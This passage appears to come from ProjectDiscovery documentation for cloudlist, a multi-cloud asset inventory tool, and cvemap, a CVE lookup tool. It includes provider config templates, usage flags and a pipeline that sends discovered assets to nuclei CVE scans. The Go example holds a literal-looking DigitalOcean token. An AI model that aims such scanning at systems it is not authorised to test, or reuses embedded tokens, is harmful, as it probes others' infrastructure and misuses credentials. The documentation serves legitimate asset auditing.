- provider: aws # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# aws_access_key is the access key for AWS account
aws_access_key: $AWS_ACCESS_KEY
# aws_secret_key is the secret key for AWS account
aws_secret_key: $AWS_SECRET_KEY
# aws_session_token session token for temporary security credentials retrieved via STS (optional)
aws_session_token: $AWS_SESSION_TOKEN
# assume_role_name is the name of the role to assume (optional)
assume_role_name: $AWS_ASSUME_ROLE_NAME
# account_ids is the aws account ids which has similar assumed role name (optional)
account_ids:
- $AWS_ACCOUNT_ID_1
- $AWS_ACCOUNT_ID_2
```
`aws_access_key` and `aws_secret_key` can be generated in the IAM console. We recommend creating a new IAM user with `Read Only` permissions and providing the access token for the user.
Scopes Required: Read EC2, Route53, S3
**References:**
1. [https://docs.aws.amazon.com/IAM/latest/UserGuide/reference\_policies\_examples\_iam\_read-only-console.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_iam_read-only-console.html)
2. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_access-keys.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
3. [https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp\_request.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html)
* AWS Assume Role:
* [https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html](https://docs.aws.amazon.com/sdkref/latest/guide/feature-assume-role-credentials.html)
* [https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role](https://docs.logrhythm.com/OCbeats/docs/aws-cross-account-access-using-sts-assume-role)
### GCP (Google Cloud Platform)
Supported GCP Services:
* [Cloud DNS](https://cloud.google.com/dns)
* [Kubernetes Engine](https://cloud.google.com/kubernetes-engine)
* [Compute Engine](https://cloud.google.com/products/compute)
* [Bucket](https://cloud.google.com/storage)
* [Cloud Functions](https://cloud.google.com/functions)
* [Cloud Run](https://cloud.google.com/run)
**Example Config:**
Google Cloud Platform can be integrated by using the following configuration block.
```yaml
- provider: gcp # provider is the name of the provider
# profile is the name of the provider profile
id: logs
# gcp_service_account_key is the minified json of a google cloud service account with list permissions
gcp_service_account_key: '{xxxxxxxxxxxxx}'
```
`gcp_service_account_key` can be retrieved by creating a new service account. To do so, create a service account with Read Only access to the `cloudresourcemanager` and `dns` scopes in IAM. Next, generate a new account key for the service account by following the steps in Reference 2. This should give you a JSON document that can be pasted in a single line into `gcp_service_account_key`.
Scopes Required: Cloud DNS, GKE
References:
1. [https://cloud.google.com/iam/docs/service-account-overview](https://cloud.google.com/iam/docs/service-account-overview)
### Azure
Supported Azure Services:
* Virtual Machines
**Example Config:**
Microsoft Azure can be integrated by using the following configuration block.
```yaml
- provider: azure # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
  # client_id is the client ID of the registered application of the azure account (not required if using cli auth)
  client_id: $AZURE_CLIENT_ID
  # client_secret is the secret of the registered application of the azure account (not required if using cli auth)
  client_secret: $AZURE_CLIENT_SECRET
  # tenant_id is the tenant ID of the registered application of the azure account (not required if using cli auth)
  tenant_id: $AZURE_TENANT_ID
  # subscription_id is the azure subscription id
  subscription_id: $AZURE_SUBSCRIPTION_ID
  # use_cli_auth if set to true cloudlist will use azure cli auth
use_cli_auth: true
```
`tenant_id`, `client_id`, `client_secret` can be obtained/generated from `All services` > `Azure Active Directory` > `App registrations`
`subscription_id` can be retrieved from `All services` > `Subscriptions`
To use CLI auth, set `use_cli_auth` to `true` and run `az login` in the terminal.
References:
1. [https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli](https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli)
2. [https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az\_ad\_sp\_create\_for\_rbac](https://docs.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az_ad_sp_create_for_rbac)
3. [https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli](https://docs.microsoft.com/en-us/cli/azure/authenticate-azure-cli)
### Alibaba Cloud
Supported Alibaba Cloud Services:
* ECS Instances
**Example Config:**
Alibaba Cloud can be integrated by using the following configuration block.
```yaml
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
```
Alibaba Cloud Access Key ID and Secret can be created by visiting [https://ram.console.aliyun.com/manage/ak](https://ram.console.aliyun.com/manage/ak)
References:
1. [https://www.alibabacloud.com/help/faq-detail/142101.htm](https://www.alibabacloud.com/help/faq-detail/142101.htm)
2. [https://www.alibabacloud.com/help/doc-detail/53045.htm](https://www.alibabacloud.com/help/doc-detail/53045.htm)
## VPS & PaaS Hosting Providers
### DO (DigitalOcean)
Supported DigitalOcean Services:
* Instances
**Example Config:**
Digitalocean can be integrated by using the following configuration block.
```yaml
- provider: do # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: xxxx
# digitalocean_token is the API key for digitalocean cloud platform
digitalocean_token: $DIGITALOCEAN_TOKEN
```
`digitalocean_token` can be generated from the DigitalOcean Control Panel. We recommend only giving Read Access to the token.
References:
1. [https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/](https://www.digitalocean.com/docs/apis-clis/api/create-personal-access-token/)
### SCW (Scaleway)
Supported Scaleway Services:
* Instances
**Example Config:**
Scaleway can be integrated by using the following configuration block.
```yaml
- provider: scw # provider is the name of the provider
# scaleway_access_key is the access key for scaleway API
scaleway_access_key: $SCALEWAY_ACCESS_KEY
# scaleway_access_token is the access token for scaleway API
scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
```
`scaleway_access_key` and `scaleway_access_token` can be generated from the Credentials options in the Scaleway console.
References -
1. [https://www.scaleway.com/en/docs/generate-api-keys/](https://www.scaleway.com/en/docs/generate-api-keys/)
### Heroku
Supported Heroku Services:
* Applications
**Example Config:**
Heroku can be integrated by using the following configuration block.
```yaml
- provider: heroku # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# heroku_api_token is the api key for Heroku account
heroku_api_token: $HEROKU_API_TOKEN
```
`heroku_api_token` can be generated from [https://dashboard.heroku.com/account/applications/authorizations/new](https://dashboard.heroku.com/account/applications/authorizations/new)
It can also be created with the Heroku CLI by running:
```bash
$ heroku authorizations:create -d "brief description of token"
Creating OAuth Authorization... done
Client:
ID: a6e98151-f242-4592-b107-25fbac5ab410
Description: brief description of token
Scope: global
Token: cf0e05d9-4eca-4948-a012-b9xxxxxxxxxx
Updated at: Fri Jun 16 2021 13:26:56 GMT-0700 (PDT) (less than a minute ago)
```
References:
1. [https://devcenter.heroku.com/articles/platform-api-quickstart#authentication](https://devcenter.heroku.com/articles/platform-api-quickstart#authentication)
### Linode
Supported Linode Services:
* Instances
**Example Config:**
Linode can be integrated by using the following configuration block.
```yaml
- provider: linode # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
```
`linode_personal_access_token` can be created from [https://cloud.linode.com/id/tokens](https://cloud.linode.com/id/tokens). Minimum scope needed is `Read Only` for `Linodes` resource.
References:
1. [https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token](https://www.linode.com/docs/guides/getting-started-with-the-linode-api/#get-an-access-token)
## CDN & DNS Management
### Fastly
Supported Fastly Services:
* Services
**Example Config:**
Fastly can be integrated by using the following configuration block.
```yaml
- # provider is the name of the provider
provider: fastly
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
```
`fastly_api_key` can be generated from [https://manage.fastly.com/account/personal/tokens](https://manage.fastly.com/account/personal/tokens)
References -
1. [https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens](https://docs.fastly.com/en/guides/using-api-tokens#creating-api-tokens)
### Namecheap
Supported Namecheap Services:
* Domain List
**Example Config:**
Namecheap can be integrated by using the following configuration block.
```yaml
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
```
Namecheap API Access can be enabled by visiting [https://ap.www.namecheap.com/settings/tools/apiaccess/](https://ap.www.namecheap.com/settings/tools/apiaccess/) and then:
* Toggle on the API Access switch
* Add your public IP to the Whitelisted IPs
References:
1. [https://www.namecheap.com/support/api/intro/](https://www.namecheap.com/support/api/intro/)
* Enabling API Access
* Whitelisting IP
### Cloudflare
Supported Cloudflare Services:
* DNS
**Example Config:**
Cloudflare can be integrated by using the following configuration block.
```yaml
- provider: cloudflare # provider is the name of the provider
# email is the email for cloudflare
email: $CF_EMAIL
# api_key is the api_key for cloudflare
api_key: $CF_API_KEY
# api_token is the scoped_api_token for cloudflare (optional)
api_token: $CF_API_TOKEN
```
`api_key` can be generated from the Cloudflare API Key manager. It needs to be the Global API Key due to a limitation of Cloudflare's new API tokens.
References:
1. [https://developers.cloudflare.com/api/keys](https://developers.cloudflare.com/api/keys)
### Hetzner Cloud
Supported Hetzner Cloud Services:
* Instances
**Example Config:**
Hetzner Cloud can be integrated by using the following configuration block.
```yaml
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
  # auth_token is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
```
References:
1. [https://docs.hetzner.cloud/#authentication](https://docs.hetzner.cloud/#authentication)
## Infrastructure Automation & Management
### Kubernetes (K8s)
Supported Kubernetes Services:
* Services
* Ingresses
**Example Config:**
To integrate Kubernetes, utilize the configuration block outlined below. This block allows you to specify Kubernetes connection details either through a file path or directly by providing the encoded kubeconfig content. If both kubeconfig\_file and kubeconfig\_encoded are specified, the kubeconfig\_encoded will take precedence.
```yaml
- provider: kubernetes # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # kubeconfig_file is the path of the kubeconfig file
  kubeconfig_file: path/to/kubeconfig
  # context is the context to be used from the kubeconfig file
  context:
```
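The paragraph above mentions `kubeconfig_encoded` as an alternative to a file path. A minimal sketch of producing that encoded value (assuming a standard kubeconfig location; this flagless form works on both GNU and BSD `base64`):
```bash
# Base64-encode the kubeconfig into a single line so it can be
# supplied inline via the kubeconfig_encoded option
base64 < ~/.kube/config | tr -d '\n'
```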
References:
1. [https://www.redhat.com/sysadmin/kubeconfig](https://www.redhat.com/sysadmin/kubeconfig)
2. [https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html](https://docs.aws.amazon.com/eks/latest/userguide/create-kubeconfig.html)
3. [https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information](https://learn.microsoft.com/en-us/azure/aks/control-kubeconfig-access#get-and-verify-the-configuration-information)
4. [https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store\_info](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#store_info)
### Hashicorp Tools
With Cloudlist you can get assets from Nomad, Consul, and Terraform. Cloudlist can query Nomad and Consul directly, and uses the Terraform state file to list Terraform-created assets.
#### Nomad
Hashicorp Nomad can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: nomad # provider is the name of the provider
  # nomad_url is the url for nomad server
  nomad_url: http://127.0.0.1:4646/
  # nomad_ca_file is the path to nomad CA file
  # nomad_ca_file: .pem
  # nomad_cert_file is the path to nomad Certificate file
  # nomad_cert_file: .pem
  # nomad_key_file is the path to nomad Certificate Key file
  # nomad_key_file: .pem
  # nomad_token is the nomad authentication token
  # nomad_token:
  # nomad_http_auth is the nomad http auth value
  # nomad_http_auth:
```
Specifying `https` in the `nomad_url` automatically turns SSL on. All fields are optional except `nomad_url`.
References:
1. [https://www.nomadproject.io/api-docs](https://www.nomadproject.io/api-docs)
#### Consul
Hashicorp Consul can be integrated by using the following configuration block.
**Example Config:**
```yaml
- provider: consul # provider is the name of the provider
  # consul_url is the url for consul server
  consul_url: http://localhost:8500/
  # consul_ca_file is the path to consul CA file
  # consul_ca_file: .pem
  # consul_cert_file is the path to consul Certificate file
  # consul_cert_file: .pem
  # consul_key_file is the path to consul Certificate Key file
  # consul_key_file: .pem
  # consul_http_token is the consul authentication token
  # consul_http_token:
  # consul_http_auth is the consul http auth value
  # consul_http_auth:
```
Specifying `https` in the `consul_url` automatically turns SSL on. All fields are optional except `consul_url`.
References:
1. [https://www.consul.io/api-docs](https://www.consul.io/api-docs)
#### Terraform
**Example Config:**
Terraform can be integrated by using the following configuration block.
```yaml
- provider: terraform # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # tf_state_file is the location of terraform state file (terraform.tfstate)
  tf_state_file: path/to/terraform.tfstate
```
### OpenStack
Supported OpenStack Services:
* Instances
**Example Config:**
```yaml
- provider: openstack # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # identity_endpoint is OpenStack identity endpoint used to authenticate
  identity_endpoint: $OS_IDENTITY_ENDPOINT
  # domain_name is OpenStack domain name used to authenticate
  domain_name: $OS_DOMAIN_NAME
  # tenant_name is OpenStack project name
  tenant_name: $OS_TENANT_NAME
  # username is OpenStack username used to authenticate
  username: $OS_USERNAME
  # password is OpenStack password used to authenticate
  password: $OS_PASSWORD
```
# Running Cloudlist
Learn about running Cloudlist with examples and support details
For all of the flags and options available for `cloudlist`, be sure to check out the [Usage](/tools/cloudlist/usage) page. On this page you can find examples with output, details of what `cloudlist` supports, and details on configuration.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
```
cloudlist
```
This will list all the assets from the configured providers in the configuration file. Specific providers and asset types can also be specified using the `provider` and `id` filters.
```console
cloudlist -provider aws,gcp
________ _____ __
/ ____/ /___ __ ______/ / (_)____/ /_
/ / / / __ \/ / / / __ / / / ___/ __/
/ /___/ / /_/ / /_/ / /_/ / / (__ ) /_
\____/_/\____/\__,_/\__,_/_/_/____/\__/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Listing assets from AWS (prod) provider.
example.com
example2.com
example3.com
1.1.1.1
2.2.2.2
3.3.3.3
4.4.4.4
5.5.5.5
6.6.6.6
[INF] Found 2 hosts and 6 IPs from AWS service (prod)
```
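The `-id` filter works the same way; for example, to list assets only from the AWS profile configured with the id `staging` (as in the provider config below):
```bash
# Restrict results to a single provider and a single named profile
cloudlist -provider aws -id staging
```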
## Running cloudlist with Nuclei
Scan assets from various cloud providers with nuclei for security assessments:
```bash
cloudlist -silent | httpx -silent | nuclei -t cves/
```
# Supported providers
For a full list of supported cloud providers, see [Cloud Providers](/tools/cloudlist/providers).
# Configuration file
The default provider config file should be located at `$HOME/.config/cloudlist/provider-config.yaml` and has the following contents as an example. In order to run this tool, the keys need to be updated in the config file for the desired providers.
## Example Provider Config
```yaml
- provider: do # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: xxxx
  # digitalocean_token is the API key for digitalocean cloud platform
  digitalocean_token: $DIGITALOCEAN_TOKEN
- provider: scw # provider is the name of the provider
  # scaleway_access_key is the access key for scaleway API
  scaleway_access_key: $SCALEWAY_ACCESS_KEY
  # scaleway_access_token is the access token for scaleway API
  scaleway_access_token: $SCALEWAY_ACCESS_TOKEN
- provider: aws # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # aws_access_key is the access key for AWS account
  aws_access_key: $AWS_ACCESS_KEY
  # aws_secret_key is the secret key for AWS account
  aws_secret_key: $AWS_SECRET_KEY
  # aws_session_token is the session token for temporary security credentials retrieved via STS (optional)
  aws_session_token: $AWS_SESSION_TOKEN
- provider: gcp # provider is the name of the provider
  # profile is the name of the provider profile
  id: logs
  # gcp_service_account_key is the minified json of a google cloud service account with list permissions
  gcp_service_account_key: '{xxxxxxxxxxxxx}'
- provider: azure # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # client_id is the client ID of registered application of the azure account (not required if using cli auth)
  client_id: $AZURE_CLIENT_ID
  # client_secret is the secret ID of registered application of the azure account (not required if using cli auth)
  client_secret: $AZURE_CLIENT_SECRET
  # tenant_id is the tenant ID of registered application of the azure account (not required if using cli auth)
  tenant_id: $AZURE_TENANT_ID
  # subscription_id is the azure subscription id
  subscription_id: $AZURE_SUBSCRIPTION_ID
  # use_cli_auth if set to true cloudlist will use azure cli auth
  use_cli_auth: true
- provider: cloudflare # provider is the name of the provider
  # email is the email for cloudflare
  email: $CF_EMAIL
  # api_key is the api_key for cloudflare
  api_key: $CF_API_KEY
  # api_token is the scoped_api_token for cloudflare (optional)
  api_token: $CF_API_TOKEN
- provider: heroku # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # heroku_api_token is the api key for Heroku account
  heroku_api_token: $HEROKU_API_TOKEN
- provider: linode # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # linode_personal_access_token is the personal access token for linode account
  linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
- provider: fastly # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # fastly_api_key is the personal API token for fastly account
  fastly_api_key: $FASTLY_API_KEY
- provider: alibaba # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # alibaba_region_id is the region id of the resources
  alibaba_region_id: $ALIBABA_REGION_ID
  # alibaba_access_key is the access key ID for alibaba cloud account
  alibaba_access_key: $ALIBABA_ACCESS_KEY
  # alibaba_access_key_secret is the secret access key for alibaba cloud account
  alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
- provider: namecheap # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # namecheap_api_key is the api key for namecheap account
  namecheap_api_key: $NAMECHEAP_API_KEY
  # namecheap_user_name is the username of the namecheap account
  namecheap_user_name: $NAMECHEAP_USER_NAME
- provider: terraform # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # tf_state_file is the location of terraform state file (terraform.tfstate)
  tf_state_file: path/to/terraform.tfstate
- provider: hetzner # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # auth_token is the hetzner authentication token
  auth_token: $HETZNER_AUTH_TOKEN
- provider: nomad # provider is the name of the provider
  # nomad_url is the url for nomad server
  nomad_url: http://127.0.0.1:4646/
  # nomad_ca_file is the path to nomad CA file
  # nomad_ca_file: .pem
  # nomad_cert_file is the path to nomad Certificate file
  # nomad_cert_file: .pem
  # nomad_key_file is the path to nomad Certificate Key file
  # nomad_key_file: .pem
  # nomad_token is the nomad authentication token
  # nomad_token:
  # nomad_http_auth is the nomad http auth value
  # nomad_http_auth:
- provider: consul # provider is the name of the provider
  # consul_url is the url for consul server
  consul_url: http://localhost:8500/
  # consul_ca_file is the path to consul CA file
  # consul_ca_file: .pem
  # consul_cert_file is the path to consul Certificate file
  # consul_cert_file: .pem
  # consul_key_file is the path to consul Certificate Key file
  # consul_key_file: .pem
  # consul_http_token is the consul authentication token
  # consul_http_token:
  # consul_http_auth is the consul http auth value
  # consul_http_auth:
- provider: openstack # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # identity_endpoint is OpenStack identity endpoint used to authenticate
  identity_endpoint: $OS_IDENTITY_ENDPOINT
  # domain_name is OpenStack domain name used to authenticate
  domain_name: $OS_DOMAIN_NAME
  # tenant_name is OpenStack project name
  tenant_name: $OS_TENANT_NAME
  # username is OpenStack username used to authenticate
  username: $OS_USERNAME
  # password is OpenStack password used to authenticate
  password: $OS_PASSWORD
- provider: kubernetes # provider is the name of the provider
  # id is the name defined by user for filtering (optional)
  id: staging
  # kubeconfig_file is the path of the kubeconfig file
  kubeconfig_file: path/to/kubeconfig
  # context is the context to be used from kubeconfig file
  context:
```
# Cloudlist as a library
It's possible to use the library directly in your Go programs. The following code snippet outlines how to list assets from all or a given cloud provider.
```go
package main

import (
	"context"
	"log"

	"github.com/projectdiscovery/cloudlist/pkg/inventory"
	"github.com/projectdiscovery/cloudlist/pkg/schema"
)

func main() {
	inventory, err := inventory.New(schema.Options{
		schema.OptionBlock{"provider": "digitalocean", "digitalocean_token": "ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242"},
	})
	if err != nil {
		log.Fatalf("%s\n", err)
	}
	for _, provider := range inventory.Providers {
		resources, err := provider.Resources(context.Background())
		if err != nil {
			log.Fatalf("%s\n", err)
		}
		for _, resource := range resources.Items {
			_ = resource // Do something with the resource
		}
	}
}
```
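To pull the package into your own module before building a snippet like the one above, something along these lines should work (assuming Go modules):
```bash
go get github.com/projectdiscovery/cloudlist@latest
```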
# Cloudlist Usage
Learn Cloudlist usage including flags and filters
## Access help
Use `cloudlist -h` to display all of the help options.
## Cloudlist options
```yaml
Cloudlist is a tool for listing Assets from multiple cloud providers.
Usage:
./cloudlist [flags]
Flags:
CONFIGURATION:
-config string cloudlist flag config file (default "$HOME/.config/cloudlist/config.yaml")
-pc, -provider-config string provider config file (default "$HOME/.config/cloudlist/provider-config.yaml")
FILTERS:
-p, -provider value display results for given providers (comma-separated) (default linode,fastly,heroku,terraform,digitalocean,consul,cloudflare,hetzner,nomad,do,scw,openstack,alibaba,aws,gcp,namecheap,kubernetes,azure)
-id string[] display results for given ids (comma-separated)
-host display only hostnames in results
-ip display only ips in results
-s, -service value query and display results from given service (comma-separated) (default cloudfront,gke,domain,compute,ec2,instance,cloud-function,app,eks,consul,droplet,vm,ecs,fastly,alb,s3,lambda,elb,cloud-run,route53,publicip,dns,service,nomad,lightsail,ingress,apigateway)
-ep, -exclude-private exclude private ips in cli output
UPDATE:
-up, -update update cloudlist to latest version
-duc, -disable-update-check disable automatic cloudlist update check
OUTPUT:
-o, -output string output file to write results
-json write output in json format
-version display version of cloudlist
-v display verbose output
-silent display only results in output
```
# Installing cvemap
Learn about how to install and get started with cvemap
To access the cvemap API data you need a ProjectDiscovery Cloud Platform (PDCP) account and API key. Check out [Running](/tools/cvemap/running) for details. Enter the command below in a terminal to install ProjectDiscovery's cvemap using Go.
```bash
go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest
```
## Installation Notes
* cvemap requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/cvemap`
# cvemap overview
A structured and easy way to navigate public CVE sources
## What is **cvemap?**
cvemap is a tool that provides a structured and easily navigable way to explore CVEs from the command line.
ProjectDiscovery's cvemap combines data from multiple public sources including:
* NVD (NIST) database of CVEs
* CISA database of CVEs and Known Exploited Vulnerabilities (KEVs)
* Data from HackerOne's CVE Discovery about the most frequently reported CVEs in their system
* Data about EPSS scoring and the mapping to Common Platform Enumeration (CPE)
* Data about public PoCs that might be available on GitHub along with the status of any Nuclei Template for fingerprinting the CVE
Read more about cvemap [on our blog](https://blog.projectdiscovery.io/announcing-cvemap-from-projectdiscovery/)
## Features and capabilities
* CVE Dataset Search & Query
* CVE to EPSS Mapping
* CVE to KEV Mapping
* CVE to CPE Mapping
* CVE to GitHub POCs Mapping
* CVE to Nuclei Template Mapping
* CVE to HackerOne report Mapping
* Customizable Filters on CVE data
* STDIN Input / JSONL Output
## Support
Questions about using cvemap? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running cvemap
Learn about running cvemap with examples including commands and output
For all of the flags and options available for `cvemap` be sure to check out the [Usage](/tools/cvemap/usage) page. On this page we'll share examples running `cvemap` with specific flags and goals
and the output you can expect from each.
*If you have questions, reach out to us through [Help](/help).*
## Prerequisites for cvemap
Before using cvemap, you'll need to get a ProjectDiscovery Cloud Platform (PDCP) account and API key so that you can access the cvemap API data.
Navigate to [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) and click “Sign Up” (or “Sign In” if you already have a PDCP account).
Once signed into ProjectDiscovery Cloud Platform, you can navigate to [https://cloud.projectdiscovery.io/?ref=api\_key](https://cloud.projectdiscovery.io/?ref=api_key) to find your API Key.
Use the copy button to copy your API Key - we need this to authenticate your install.
To authenticate your install of cvemap, run
```bash
cvemap -auth
```
When prompted, paste the key you obtained above.
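For non-interactive environments (e.g. CI), the key can alternatively be supplied through an environment variable; assuming your cvemap version honors `PDCP_API_KEY`, a minimal sketch:
```bash
# Assumption: PDCP_API_KEY is read by cvemap at startup,
# avoiding the interactive -auth prompt
export PDCP_API_KEY="<your-api-key>"
cvemap -limit 5
```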
## Basic Examples
By default, `cvemap` lists CVEs from the Known Exploited Vulnerabilities (KEV) catalog published by [CISA](https://www.cisa.gov/known-exploited-vulnerabilities-catalog).
### List top known exploited vulnerabilities
```bash
$ cvemap -limit 10
______ _____ ____ ___ ____ ____
/ ___/ | / / _ \/ __ \__ \/ __ \/ __ \
/ /__ | |/ / __/ / / / / / /_/ / /_/ /
\___/ |___/\___/_/ /_/ /_/\__,_/ .___/
/_/
projectdiscovery.io
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | AGE |
|---------------|------|----------|---------|-----------------------|----------|-----|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | 18 |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | 38 |
| CVE-2023-4966 | 7.5 | HIGH | 0.92267 | netscaler_application | ✅ | 26 |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | 54 |
| CVE-2023-46748| 8.8 | HIGH | 0.00607 | | ❌ | 10 |
| CVE-2023-46747| 9.8 | CRITICAL | 0.95304 | | ✅ | 10 |
| CVE-2023-46604| 10 | CRITICAL | 0.01596 | | ✅ | 9 |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | 26 |
| CVE-2023-42824| 7.8 | HIGH | 0.00062 | ipados | ❌ | 32 |
| CVE-2023-42793| 9.8 | CRITICAL | 0.97264 | teamcity | ✅ | 47 |
```
### List top CVEs on HackerOne
List top CVEs being reported on hackerone platform using `-h1` or `-hackerone` option.
```bash
$ cvemap -h1
```
```markdown
| CVE | CVSS | SEVERITY | RANK | REPORTS | PRODUCT | TEMPLATE | AGE |
|----------------|------|----------|------|---------|----------------------|----------|------|
| CVE-2020-35946 | 5.4 | MEDIUM | 1 | 304 | all_in_one_seo_pack | ❌ | 1038 |
| CVE-2023-4966 | 7.5 | HIGH | 2 | 54 | netscaler_application| ✅ | 26 |
| CVE-2023-22518 | 9.1 | CRITICAL | 3 | 27 | | ✅ | 5 |
| CVE-2017-15277 | 6.5 | MEDIUM | 4 | 1139 | graphicsmagick | ❌ | 2215 |
| CVE-2023-35813 | 9.8 | CRITICAL | 5 | 54 | experience_commerce | ✅ | 141 |
| CVE-2022-38463 | 6.1 | MEDIUM | 6 | 342 | servicenow | ✅ | 439 |
| CVE-2020-11022 | 6.1 | MEDIUM | 7 | 209 | jquery | ❌ | 1285 |
| CVE-2020-11023 | 6.1 | MEDIUM | 8 | 208 | jquery | ❌ | 1285 |
| CVE-2023-38205 | 7.5 | HIGH | 9 | 162 | coldfusion | ✅ | 52 |
| CVE-2019-11358 | 6.1 | MEDIUM | 10 | 214 | jquery | ❌ | 1660 |
```
cvemap provides multiple ways to query CVE data, e.g. by `product`, `vendor`, `severity`, `cpe`, `assignee`, `cvss-score`, `epss-score`, `age`, etc. For example:
### List all CVEs for Confluence
List all the cves published for Atlassian Confluence:
```bash
cvemap -product confluence -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|------------|----------|
| CVE-2020-4027 | 4.7 | MEDIUM | 0.00105 | confluence | ❌ |
| CVE-2019-3398 | 8.8 | HIGH | 0.97342 | confluence | ✅ |
| CVE-2019-3396 | 9.8 | CRITICAL | 0.97504 | confluence | ✅ |
| CVE-2019-3395 | 9.8 | CRITICAL | 0.07038 | confluence | ❌ |
| CVE-2019-3394 | 8.8 | HIGH | 0.1885 | confluence | ❌ |
```
By default, cvemap displays a limited set of fields, which can be customized and controlled using the `-field` / `-f` option, for example:
```bash
$ cvemap -severity critical -field assignee,vstatus,poc -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | ASSIGNEE | VSTATUS | POC |
|---------------|------|----------|---------|------------------|----------|------------------------|-------------|-------|
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5832 | 9.1 | CRITICAL | 0.00043 | | ❌ | security@huntr.dev | UNCONFIRMED | FALSE |
| CVE-2023-5824 | 9.6 | CRITICAL | 0.00045 | | ❌ | secalert@redhat.com | UNCONFIRMED | FALSE |
| CVE-2023-5820 | 9.6 | CRITICAL | 0.00047 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ | cve@usom.gov.tr | CONFIRMED | FALSE |
```
To list CVEs matching a threshold, such as a CVSS score or EPSS score / percentile, the options below can be used:
```bash
